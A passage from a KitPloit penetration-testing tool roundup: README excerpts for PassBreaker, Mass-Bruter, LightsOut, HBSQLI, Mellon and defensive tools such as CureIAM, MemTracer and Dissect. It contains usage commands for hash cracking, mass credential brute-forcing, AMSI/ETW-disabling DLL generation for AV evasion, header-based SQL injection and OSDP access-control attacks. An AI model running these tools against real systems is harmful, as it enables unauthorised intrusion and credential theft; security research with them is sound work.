    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

    This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

    Parallel Processing

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

    This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

    These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

    Disclaimer

    This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

    Contributing

    Contributions are welcome! To contribute to PassBreaker, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

    License

    PassBreaker is released under the MIT License. See LICENSE for more information.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    T3SF - Technical Tabletop Exercises Simulation Framework

    By: Zion3R β€” December 2nd 2023 at 11:30


    T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL) together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module performs the communication with the specific module (Discord, Slack, Telegram, etc.) that allows the events to present the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas".


    Getting Things Ready

    To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.

    To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

    # Python 3.6+ required
    python -m venv .venv # We will create a python virtual environment
    source .venv/bin/activate # Let's get inside it

    pip install -U pip # Upgrade pip

    Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

    pip install "T3SF[Discord]"  # Install the framework to work with Discord

    or

    pip install "T3SF[Slack]"  # Install the framework to work with Slack

    This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.

    We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:

    Usage

    We created this framework to simplify all your work!

    Using Docker

    Supported Tags

    • slack β†’ This image has all the requirements to perform an exercise in Slack.
    • discord β†’ This image has all the requirements to perform an exercise in Discord.

    Using it with Slack

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

    Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.

    Using it with Discord

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

    Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.


    Once you have everything ready, use our template for the main.py, or modify the following code:

    Here is an example if you want to run the framework with the Discord bot and a GUI.

    from T3SF import T3SF
    import asyncio

    async def main():
    await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

    if __name__ == '__main__':
    asyncio.run(main())

    Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it!

    Yes, that simple!

    await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

    If you need more help, you can always check our documentation here!



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Mass-Bruter - Mass Bruteforce Network Protocols

    By: Zion3R β€” November 26th 2023 at 11:30


    Mass bruteforce network protocols

    Info

    Simple personal script to quickly mass bruteforce common services in a large scale of network.
    It will check for default credentials on ftp, ssh, mysql, mssql...etc.
    This was made for authorized red team penetration testing purpose only.


    How it works

    1. Use masscan(faster than nmap) to find alive hosts with common ports from network segment.
    2. Parse ips and ports from masscan result.
    3. Craft and run hydra commands to automatically bruteforce supported network services on devices.

    Requirements

    • Kali linux or any preferred linux distribution
    • Python 3.10+
    # Clone the repo
    git clone https://github.com/opabravo/mass-bruter
    cd mass-bruter

    # Install required tools for the script
    apt update && apt install seclists masscan hydra

    How To Use

    Private ip range : 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

    Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

    Ex: masscan_192.168.0.0-16.txt

    Example command:

    masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

    Example Resume Command:

    masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

    Command Options

    Bruteforce Script Options: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit." dir="auto">
    β”Œβ”€β”€(rootγ‰Ώroot)-[~/mass-bruter]
    └─# python3 mass_bruteforce.py
    Usage: [OPTIONS]

    Mass Bruteforce Script

    Options:
    -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
    mssql, postgres, oracle)
    -a, --all Brute all services(Very Slow)
    -s, --show Show result with successful login
    -f, --file-path PATH The directory or file that contains masscan result
    [default: ./result/masscan/]
    --help Show this message and exit.

    Quick Bruteforce Example:

    python3 mass_bruteforce.py -q -f ~/masscan_script.txt

    Fetch cracked credentials:

    python3 mass_bruteforce.py -s

    Todo

    • Migrate with dpl4hydra
    • Optimize the code and functions
    • MultiProcessing

    Any contributions are welcomed!



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

    By: Zion3R β€” November 21st 2023 at 11:30

    Clean up of over permissioned IAM accounts on GCP infra in an automated way

    CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.


    Key features

    Discover what makes CureIAM scalable and production grade.

    • Config driven : The entire workflow of CureIAM is config driven. Skip to Config section to know more about it.
    • Scalable : Its is designed to scale because of its plugin driven, multiprocess and multi-threaded approach.
    • Handles Scheduling: Scheduling part is embedded in CureIAM code itself, configure the time, and CureIAM will run daily at that time note.
    • Plugin driven: CureIAM codebase is completely plugin oriented, which means, one can plug and play the existing plugins or create new to add more functionality to it.
    • Track actionable insights: Every action that CureIAM takes, is recorded for audit purpose, It can do that in file store and in elasticsearch store. If you want you can build other store plugins to push that to other stores for tracking purposes.
    • Scoring and Enforcement: Every recommendation that is fetch by CureIAM is scored against various parameters, after that couple of scores like safe_to_apply_score, risk_score, over_privilege_score. Each score serves a different purpose. For safe_to_apply_score identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml config file.

    Usage

    Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml and there is Service account JSON file present in current directory with name preferably cureiamSA.json. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.

    # Install necessary dependencies
    $ pip install -r requirements.txt

    # Run CureIAM now
    $ python -m CureIAM -n

    # Run CureIAM process as schedular
    $ python -m CureIAM

    # Check CureIAM help
    $ python -m CureIAM --help

    CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.

    # Build docker image from dockerfile
    $ docker build -t cureiam .

    # Run the image, as schedular
    $ docker run -d cureiam

    # Run the image now
    $ docker run -f cureiam -m cureiam -n

    Config

    CureIAM.yaml configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.

    1. Let's configure first section, which is logging configuration and scheduler configuration.
      logger:
    version: 1

    disable_existing_loggers: false

    formatters:
    verysimple:
    format: >-
    [%(process)s]
    %(name)s:%(lineno)d - %(message)s
    datefmt: "%Y-%m-%d %H:%M:%S"

    handlers:
    rich_console:
    class: rich.logging.RichHandler
    formatter: verysimple

    file:
    class: logging.handlers.TimedRotatingFileHandler
    formatter: simple
    filename: /tmp/CureIAM.log
    when: midnight
    encoding: utf8
    backupCount: 5

    loggers:
    adal-python:
    level: INFO

    root:
    level: INFO
    handlers:
    - rich_console
    - file

    schedule: "16:00"

    This subsection of config uses, Rich logging module and schedules CureIAM to run daily at 16:00.

    1. Next section is configure different modules, which we MIGHT use in pipeline. This falls under plugins section in CureIAM.yaml. You can think of this section as declaration for different plugins.
      plugins:
    gcpCloud:
    plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
    params:
    key_file_path: cureiamSA.json

    filestore:
    plugin: CureIAM.plugins.files.filestore.FileStore

    gcpIamProcessor:
    plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
    params:
    mode_scan: true
    mode_enforce: true
    enforcer:
    key_file_path: cureiamSA.json
    allowlist_projects:
    - alpha
    blocklist_projects:
    - beta
    blocklist_accounts:
    - foo@bar.com
    allowlist_account_types:
    - user
    - group
    - serviceAccount
    blocklist_account_types:
    - None
    min_safe_to_apply_score_user: 0
    min_safe_to_apply_scor e_group: 0
    min_safe_to_apply_score_SA: 50

    esstore:
    plugin: CureIAM.plugins.elastic.esstore.EsStore
    params:
    # Change http to https later if your elastic are using https
    scheme: http
    host: es-host.com
    port: 9200
    index: cureiam-stg
    username: security
    password: securepassword

    Each of these plugins declaration has to be of this form:

      plugins:
    <plugin-name>:
    plugin: <class-name-as-python-path>
    params:
    param1: val1
    param2: val2

    For example, for plugins CureIAM.stores.esstore.EsStore which is this file and class EsStore. All the params which are defined in yaml has to match the declaration in __init__() function of the same plugin class.

    1. Once plugins are defined , next step is to define how to define pipeline for auditing. And it goes like this:
      audits:
    IAMAudit:
    clouds:
    - gcpCloud
    processors:
    - gcpIamProcessor
    stores:
    - filestore
    - esstore

    Multiple Audits can be created out of this. The one created here is named IAMAudit with three plugins in use, gcpCloud, gcpIamProcessor, filestores and esstore. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.

    1. Tell CureIAM to run the Audits defined in previous step.
      run:
    - IAMAudits

    And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.

    Dashboard

    The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.

    Contribute

    [Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!

    Credits

    Gojek Product Security Team

    Demo

    <>

    =============

    NEW UPDATES May 2023 0.2.0

    Refactoring

    • Breaking down the large code into multiple small function
    • Moving all plugins into plugins folder: Esstore, files, Cloud and GCP.
    • Adding fixes into zero divide issues
    • Migration to new major version of elastic
    • Change configuration in CureIAM.yaml file
    • Tested in python version 3.9.X

    Library Updates

    Adding the version in library to avoid any back compatibility issues.

    • Elastic==8.7.0 # previously 7.17.9
    • elasticsearch==8.7.0
    • google-api-python-client==2.86.0
    • PyYAML==6.0
    • schedule==1.2.0
    • rich==13.3.5

    Docker Files

    • Adding Docker Compose for local Elastic and Kibana in elastic
    • Adding .env-ex change .env-ex to .env to before running the docker
    Running docker compose: docker-compose -f docker_compose_es.yaml up 

    Features

    • Adding the capability to run scan without applying the recommendation. By default, if mode_scan is false, mode_enforce won't be running.
          mode_scan: true
    mode_enforce: false
    • Turn off the email function temporarily.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    MemTracer - Memory Scaner

    By: Zion3R β€” November 20th 2023 at 11:30


    MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. The MemTracer is implemented in Python language, aiming to detect reflectively loaded native .NET framework Dynamic-Link Library (DLL). This is achieved by looking for the following abnormal memory region’s characteristics:

    • The state of memory pages flags in each memory region. Specifically, the MEM_COMMIT flag which is used to reserve memory pages for virtual memory use.
    • The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
    • The memory protection for the region. The PAGE_READWRITE protection to indicate that the memory region is readable and writable, which happens if Assembly.Load(byte[]) method is used to load a module into memory.
    • The memory region contains a PE header.

    The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
    Furthermore, the tool features the following options:

    • Dump the compromised process.
    • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
    • Search for specific loaded module by name.

    Example

    python.exe memScanner.py [-h] [-r] [-m MODULE]
    -h, --help show this help message and exit
    -r, --reflectiveScan Looking for reflective DLL loading
    -m MODULE, --module MODULE Looking for spcefic loaded DLL

    The script needs administrator privileges in order incepect all processes.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

    By: Zion3R β€” November 19th 2023 at 11:30


    LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).

    LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.


    Features currently include:

    • XOR encoding for strings
    • WinAPI function name randomization
    • Multiple sandbox check options
    • Hardware breakpoint bypass option
     _______________________
    | |
    | AMSI + ETW |
    | |
    | LIGHTS OUT |
    | _______ |
    | || || |
    | ||_____|| |
    | |/ /|| |
    | / / || |
    | /____/ /-' |
    | |____|/ |
    | |
    | @icyguider |
    | |
    | RG|
    `-----------------------'
    usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

    Generate an obfuscated DLL that will disable AMSI & ETW

    options:
    -h, --help show this help message and exit
    -m <method>, --method <method>
    Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
    -s <option>, --sandbox &lt ;option>
    Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
    -sa <value>, --sandbox-arg <value>
    Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
    -k <key>, --key <key>
    Key to encode strings with (randomly generated by default)
    -o <outfile>, --outfile <outfile>
    File to save DLL to

    Remote options:
    -p <pid>, --pid <pid>
    PID of remote process to patch

    Intended Use/Opsec Considerations

    This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

    Usage Examples

    You can transfer the output DLL to your target system and load it into powershell various ways. For example, it can be done via P/Invoke with LoadLibrary:

    Or even easier, copy powershell to an arbitrary location and side load the DLL!

    Greetz/Credit/Further Reference:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R β€” October 28th 2023 at 11:30


    During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin ips

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

    4 - Now go to http://:8000/search and enjoy the search engine

    1- download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- update script.py and settings file to the host 'localhost':

    #script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
    #se/settings.py

    ELASTICSEARCH_DSL = {
    'default': {
    'hosts': 'localhost:9200'
    },
    }

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

    as an example searching for .mil data gives:

    searching for tesla as en example gives :

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

    By: Zion3R β€” October 15th 2023 at 11:30


    JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


    Prerequisites

    Before installing JSpector, you need to have Jython installed on Burp Suite.

    Installation

    1. Download the latest version of JSpector
    2. Open Burp Suite and navigate to the Extensions tab.
    3. Click the Add button in the Installed tab.
    4. In the Extension Details dialog box, select Python as the Extension Type.
    5. Click the Select file button and navigate to the JSpector.py.
    6. Click the Next button.
    7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

    Usage

    • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
    • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

    By: Zion3R β€” October 15th 2023 at 00:31


    HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.Β 


    Disclaimer:

    This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

    The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

    Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

    By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

    Installation

    Install HBSQLI with following steps:

    $ git clone https://github.com/SAPT01/HBSQLI.git
    $ cd HBSQLI
    $ pip3 install -r requirements.txt

    Usage/Examples

    usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

    options:
    -h, --help show this help message and exit
    -l LIST, --list LIST To provide list of urls as an input
    -u URL, --url URL To provide single url as an input
    -p PAYLOADS, --payloads PAYLOADS
    To provide payload file having Blind SQL Payloads with delay of 30 sec
    -H HEADERS, --headers HEADERS
    To provide header file having HTTP Headers which are to be injected
    -v, --verbose Run on verbose mode

    For Single URL:

    $ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

    For List of URLs:

    $ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

    Modes

    There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command

    Notes

    • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

    • You can use the provided headers file or even some more custom header in that file itself according to your need.

    Demo



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

    By: Zion3R β€” October 5th 2023 at 11:30

    Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

    This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


    What is Dissect?

    Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

    Singular approach

    And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

    If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

    Create a lightweight container using Acquire

    Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

    A modular setup

    Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

    Try it out now!

    Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

    Don’t know where to start? Check out the introduction page.

    Want to get a detailed overview? Check out the overview page.

    Want to read everything? Check out the documentation.

    Projects

    Dissect currently consists of the following projects.

    Related

    These projects are closely related to Dissect, but not installed by this meta package.

    Requirements

    This project is part of the Dissect framework and requires Python.

    Information on the supported Python versions can be found in the Getting Started section of the documentation.

    Installation

    dissect is available on PyPI.

    pip install dissect

    Build and test instructions

    This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

    tox -e build

    The build artifacts can be found in the dist/ directory.

    tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

    tox

    For a more elaborate explanation on how to build and test the project, please see the documentation.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Mellon - OSDP Attack Tool

    By: Zion3R β€” October 1st 2023 at 11:30


    OSDP attack tool (and the Elvish word for friend)

    Attack #1: Encryption is Optional

    OSDP supports, but doesn't strictly require, encryption. So your connection might not even be encrypted at all. Attack #1 is just to passively listen and see if you can read the card numbers on the wire.

    Attack #2: Downgrade Attack

    Just because the controller and reader support encryption doesn't mean they're configured to require it be used. An attacker can modify the reader's capability reply message (osdp_PDCAP) to advertise that it doesn't support encryption. When this happens, some controllers will barrel ahead without encryption.

    Attack #3: Install-mode Attack

    OSDP has a quasi-official β€œinstall mode” that applies to both readers and controllers. As the name suggests, it’s supposed to be used when first setting up a reader. What it does is essentially allow readers to ask the controller for what the base encryption key (the SCBK) is. If the controller is configured to be persistently in install-mode, then an attacker can show up on the wire and request the SCBK.

    Attack #4: Weak Keys

    OSDP sample code often comes with hardcoded encryption keys. Clearly these are meant to be samples, where the user is supposed to generate keys in a secure way on their own. But this is not explained or made simple for the user, however. And anyone who’s been in security long enough knows that whatever’s the default is likely to be there in production.

    So as an attack vector, when the link between reader and controller is encrypted, it’s worth a shot to enumerate some common weak keys. Now these are 128-bit AES keys, so we’re not going to be able to enumerate them all. Or even a meaningful portion of them. But what we can do is hit some common patterns that you see when someone hardcodes a key:

    • All single-byte values. [0x04, 0x04, 0x04, 0x04 …]
    • All monotonically increasing byte values. [0x01, 0x02, 0x03, 0x04, …]
    • All monotonically decreasing byte values. [0x0A, 0x09, 0x08, 0x07, …]

    Attack #5: Keyset Capture

    OSDP has no in-band mechansim for key exchange. What this means is that an attacker can:

    • Insert a covert listening device onto the wire.
    • Break / factory reset / disable the reader.
    • Wait for someone from IT to come and replace the reader.
    • Capture the keyset message (osdp_KEYSET) when the reader is first setup.
    • Decrypt all future messages.

    Getting A Testbed Setup (Linux/MacOS)

    You'll find proof-of-concept code for each of these attacks in attack_osdp.py. Checkout the --help command for more details on usage. This is a Python script, meant to be run from a laptop with USB<-->RS485 adapters like one of these. So you'll probably want to pick some of those up. Doesn't have to be that model, though.

    If you have a controller you want to test, then great. Use that. If you don't, then we have an intentionally-vulnerable OSDP controller that you can use here: vulnserver.py.

    Some of the attacks in attack_osdp.py will expect to be as a full MitM between a functioning reader and controller. To test these, you might need three USB<-->RS485 adapters, hooked together with a breadboard.

    Additional Medium / Low Risk Issues

    These issues are not, in isolation, exploitable but nonetheless represent a weakening of the protocol, implementation, or overall system.

    • MACs are truncated to 32 bits "to reduce overhead". This is very nearly (but not quite in our calculation) within practical exploitable range.
    • IVs (which are derived from MACs) are similarly reduced to 32 bits of entropy. This will cause IV reuse, which is a big red flag for a protocol.
    • Session keys are only generated using 48 bits of entropy from the controller RNG nonce. This appears to not be possible for an observing attacker to enumerate offline, however. (Unless we're missing something, in which case this would become a critical issue.)
    • Sequence numbers consist of only 2 bits, not providing sufficient liveness.
    • CBC-mode encryption is used. GCM would be a more modern block cipher mode appropriate for network protocols.
    • SCS modes 15 & 16 are essentially "null ciphers", and should not exist. They don't encrypt data.
    • The OSDP command byte is always unencrypted, even in the middle of a Secure Channel session. This is a huge benefit to attackers, making attack tools much easier to write. It means that an attacker can always see what "type" of packet is being sent, even if it's otherwise encrypted. Attackers can tell when people badge in, when the LED lights up, etc... This is not information that should be in plaintext.
    • SCBK-D (a hardcoded "default" encryption key) provides no security and should be removed. It serves only to obfuscate and provide a false sense of security.


    ❌